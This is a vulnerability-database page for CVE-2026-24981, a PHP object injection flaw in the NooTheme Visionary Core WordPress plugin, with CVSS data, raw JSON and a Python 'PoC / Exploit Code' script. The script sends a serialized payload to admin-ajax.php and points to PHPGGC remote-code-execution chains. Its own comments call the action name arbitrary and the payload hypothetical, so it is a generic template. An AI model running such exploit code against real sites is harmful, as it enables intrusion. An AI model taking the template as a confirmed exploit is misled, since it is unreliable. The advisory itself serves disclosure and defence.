Security Vulnerability Report
中文
CVE-2026-24981 CVSS 8.8 HIGH

CVE-2026-24981

Published: 2026-03-25 17:16:41
Last Modified: 2026-04-24 16:32:54

Description

Deserialization of Untrusted Data vulnerability in NooTheme Visionary Core noo-visionary-core allows Object Injection.This issue affects Visionary Core: from n/a through <= 1.4.9.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

NooTheme Visionary Core <= 1.4.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # Target URL configuration target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" # Hypothetical malicious serialized payload # In a real exploitation scenario, replace this with a valid POP chain payload # generated by tools like PHPGGC (e.g., phpggc Guzzle/RCE1 'system("id")') malicious_payload = 'O:8:"stdClass":1:{s:3:"cmd";s:2:"id";}' headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded", "Cookie": "wordpress_logged_in_xxx=xxx" # Low privilege cookie if needed } # Data payload simulating the vulnerable endpoint data = { "action": "noo_visionary_core_action", # Arbitrary action name based on plugin structure "insecure_data": malicious_payload } try: print(f"[*] Sending payload to {target_url}...") response = requests.post(target_url, headers=headers, data=data, timeout=10) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:") print(response.text[:200]) # Print partial response else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24981", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:16:40.610", "lastModified": "2026-04-24T16:32:53.997", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in NooTheme Visionary Core noo-visionary-core allows Object Injection.This issue affects Visionary Core: from n/a through <= 1.4.9."}, {"lang": "es", "value": "Vulnerabilidad de deserialización de datos no confiables en NooTheme Visionary Core noo-visionary-core permite la inyección de objetos. Este problema afecta a Visionary Core: desde n/a hasta &lt;= 1.4.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/noo-visionary-core/vulnerability/wordpress-visionary-core-plugin-1-4-9-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}